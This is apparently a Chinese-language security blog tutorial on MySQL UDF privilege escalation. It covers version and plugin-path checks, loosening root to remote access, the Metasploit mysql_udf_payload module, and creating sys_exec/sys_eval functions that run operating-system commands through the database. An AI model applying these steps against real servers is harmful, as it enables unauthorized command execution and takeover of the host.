mysql数据库udf提权
mysql数据库udf提权步骤
UDF(user defined function),即用户自定义函数。通过添加新函数,对MySQL数据库的功能进行扩充,就像使用本地MySQL函数如 database() 或 version() 一样。
1、在mysql>5.1版本,udf.dll应放置在mysql安装目录的lib\plugin下。
在mysql<5.1版本,udf.dll应放置在C:\windows或者C:\windows\system32目录。
查看mysql数据库版本是8.0.12,所以udf.dll应该放置在mysql\lib\plugin目录下。
2,查看数据库的导入导出文件权限,可以在my.ini配置文件修改secure_file_priv的值
Secure_file_priv=’ ’ 表示不对数据库的导入导出权限做限制
Secure_file_priv=\C:\ 表示数据库仅允许在C:下有导入导出权限
Secure_file_priv=’null’ 表示数据库不允许导入导出
1 | show global variables like 'secure_file_priv'; |
3、查看主机操作系统与数据库的位数
1 | show variables like '%compile%'; |
4、查看plugin的绝对路径
1 | show variables like '%plugin%'; |
5、查看数据库是否允许远程连接
1 | show databases; |
如果需要更改用下面这条命令
1 | update user set host = '%' where user = 'root'; |
6、启动msf,加载exploit/multi/mysql/mysql_udf_payload模块
加资完模块后,设置好远程连接数据库的地址,连接数据库的用户名和密码。开始攻击
7 攻击完成后,打开D:\phpstudy_pro\Extensions\MySQL8.0.12\lib\plugin,可以看到新生成的FWVPNtlC.dll (dll名称是随机的)。
8、hHhBWijL.dll文件中包含sys_exec()和sys_eval()两个函数,但是默认只创建sys_exec()函数,sys_exec()函数没有回显,执行正确时返回值为0,执行结果错误时返回值为1。我们可以手动创建 sys_eval() 函数,来执行有回显的命令。
select sys_exec('whoami');执行正确返回值为0
select sys_exec(‘whoami1’)执行错误返回值为1
create function sys_eval returns string soname 'FWVPNtlC.dll';创建eval函数
- 本文作者: y0lo
- 本文链接: http://example.com/2021/01/23/mysql数据库udf提权/
- 版权声明: 本博客所有文章除特别声明外,均采用 MIT 许可协议。转载请注明出处!